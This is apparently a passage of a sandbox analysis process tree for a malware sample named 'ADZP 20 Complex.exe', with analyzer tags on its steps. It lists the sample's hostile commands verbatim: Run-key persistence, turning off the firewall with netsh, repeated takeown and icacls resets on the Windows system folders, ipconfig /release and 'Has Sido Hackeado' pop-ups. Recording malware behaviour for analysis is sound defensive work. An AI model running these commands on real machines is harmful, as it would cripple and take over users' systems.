C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:2668
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"8⤵PID:8912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:9036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:9064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:7608
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Possible privilege escalation attempt
PID:6076
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:5512
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8424
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:6036
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:4704
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:9308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10072
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:5452
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:6496
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:3636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10716
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11004
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:11040
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:7472
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:6680
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:8364
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\232E.tmp\232F.tmp\2330.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:7044
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13408
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:12312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:10420
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:8912
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\203B.tmp\203C.tmp\203D.bat C:\Windows\System32\Twain_20.dll"11⤵PID:10236
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:13104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:9376
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:14596
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14860
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:9456
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4340
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
PID:14296
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:9112
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:15228
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:2832
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:11376
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:5816
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:6232
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4232
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:5772
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:1316
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:8020
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:448
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:3592
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:13236
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:3076
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:6044
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14448
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:1004
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:11780
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:5252
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:12868
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:10872
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:12304
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:11412
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:10668
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:1748
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14752
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14772
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:9500
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:8108
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:8104
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8092
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:11928
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:12464
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:12460
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:5428
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2120
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
PID:9848
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:9468
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:6844
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:13280
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:14888
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:12876
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:12496
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:14840
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:12788
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:9580
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:14904
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:11468
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7128
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14320
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3928
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:12640
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:14808
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:9772
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:15068
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:1032
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:15256
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:9112
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:4584
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:3860
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:9876
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:8076
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5780
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:13192
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:448
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:3592
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:1180
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:1184
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:11840
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:6736
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:14736
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5252
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6416
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:11412
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:9720
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:15172
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:12708
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14772
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:11928
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:6408
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:12628
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:636
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:14056
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14064
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:13820
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:13984
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14076
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:13464
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:14316
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:9124
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:12656
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:13724
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:10380
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:11016
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:2380
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14200
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:5096
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:14780
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:4764
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5372
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:10940
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:13512
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:10688
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
PID:14692
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*9⤵
- Views/modifies file attributes
PID:10320
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:8748
-
-
C:\Windows\system32\calc.execalc7⤵PID:920
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:8324
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:8660
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:11352
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3D8C.tmp\3D8D.tmp\3D8E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11820
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:12608
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"10⤵PID:7944
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:13232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:2084
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"10⤵PID:3928
-
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:11576
-
-
C:\Windows\system32\calc.execalc7⤵PID:11764
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:12080
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:6724
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:12360
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6AA7.tmp\6AA8.tmp\6AA9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:13296
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:15348
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:6020
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D0AF.tmp\D0B0.tmp\D0B1.bat C:\Windows\System32\Twain_20.dll"11⤵PID:1488
-
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:9436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:14868
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:12780
-
-
C:\Windows\system32\calc.execalc7⤵PID:13048
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:11180
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:12668
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14380
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:14952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:2912
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9312
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12648
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:15064
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:8068
-
-
C:\Windows\system32\calc.execalc5⤵PID:8112
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:8124
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:8136
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:8144
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F260.tmp\E6.tmp\E7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:7816
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:8808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:4808
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:2052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:4884
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵PID:9340
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:9296
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:9476
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:9848
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:10396
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:9760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:12344
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9300
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:15308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:15196
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:5724
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:4340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:7360
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:14752
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:6244
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:7648
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:7172
-
-
C:\Windows\system32\calc.execalc5⤵PID:7064
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6236
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:7432
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6692
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F741.tmp\115.tmp\116.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:6080
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll8⤵PID:9452
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B8F.tmp\9B90.tmp\9B91.bat C:\Windows\System32\Twain_20.dll"9⤵PID:9548
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd10⤵PID:8132
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll11⤵PID:14460
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2CFD.tmp\2CFE.tmp\2CFF.bat C:\Windows\System32\Twain_20.dll"12⤵PID:14552
-
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵
- Modifies Windows Firewall
PID:12120
-
-
-
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"8⤵PID:12612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:9252
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:9812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:9956
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵PID:7060
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:6608
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:7336
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:5876
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:12520
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:13732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10096
-
-
